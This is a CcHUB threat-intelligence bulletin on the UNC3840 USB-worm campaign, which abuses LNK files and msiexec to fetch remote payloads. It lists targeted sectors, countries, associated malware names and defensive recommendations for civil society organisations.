Intelligence on Malware, Threat Actors, and Campaigns in Motion

Introduction

Darkstream Dispatch is a monthly intelligence report dedicated to tracking and analyzing malware families, threat actors, and cyber campaigns primarily targeting Civil Society Organizations (CSOs), human rights defenders, and advocacy groups. As digital threats become more sophisticated, CSOs face increasing risks from state-sponsored actors, cybercriminals, and surveillance campaigns designed to compromise their operations, communications, and safety. This volume focuses on the worm propagated campaign tracked as UNC3840 that is spread using infected USB-based storage media.

Description

This campaign monitors UNC3840 activity linked to a worm that spreads through USB storage devices. The worm generates and executes an LNK file embedded with an msiexec.exe command, which retrieves and runs a remote payload. Interestingly, some of the command-and-control domains used by the worm resolve to IP addresses associated with what appear to be compromised QNAP storage devices. After the worm executes, UNC3840’s behavior has largely indicated reconnaissance activity, with second-stage payloads observed in only a few instances.

Overview

Campaign Type: 

Trojan

Motivation(s): 

Financial Gain

Source Region:  

Unknown

Confirmed Targeted Industries: 

Aerospace & Defense, Chemicals & Materials, Civil Society & Non-Profits, Construction & Engineering, Education, Energy & Utilities, Government, Healthcare, Hospitality, Legal & Professional Services, Manufacturing, Media & Entertainment, Oil & Gas, Pharmaceuticals, Retail, Technology, Telecommunications, Transportation.

Associated Threat Actors: 

UNC3840

Associated Malware: 

BEACON, BIRDBAIT, DENSEDROP, DENSELAUNCH, FRUITBIRD, MESSBUCKET

Targeted Countries: 

Albania, Australia, Belgium, Canada, Colombia, Denmark, Egypt, France, Germany, India, Indonesia, Italy, Japan, Mexico, New Zealand, Pakistan, Philippines, Saudi Arabia, Singapore, South Africa, Sweden, Switzerland, Thailand, Ukraine, United Kingdom, United States.

Associated Tools

CMDEXE, NLTEST, TOR, WHOAMI

Find the full list of IOCs here:

Security Recommendations

CcHUB recommends that organizations;

• Restrict USB usage: Enforce policies to disable or control USB storage; scan devices before use.
• Harden against LNK abuse: Block or monitor LNK file execution and suspicious msiexec.exe calls.
• Control msiexec.exe network activity: Restrict downloads and monitor unusual network execution.
• Block C2 infrastructure: Add known domains/IPs to blocklists; monitor outbound traffic to suspicious NAS devices.
• Network segmentation: Limit lateral movement and enforce least privilege access.
• Monitor reconnaissance behavior: Detect network scanning, SMB/RDP activity, and system discovery commands.
• Patch and secure NAS devices: Update firmware, enforce strong credentials, and restrict internet exposure.
• Deploy layered malware detection: Use EDR/XDR to detect USB worms, LNK attacks, and behavioral anomalies.
• User awareness training: Educate on USB risks, suspicious files, and reporting unusual behavior.
• Incident response planning: Prepare playbooks for quarantine, credential revocation, media isolation, and forensic analysis.

If you also suspect a security breach of some sort, reach out to us on our helpdesk (help@cchub.africa)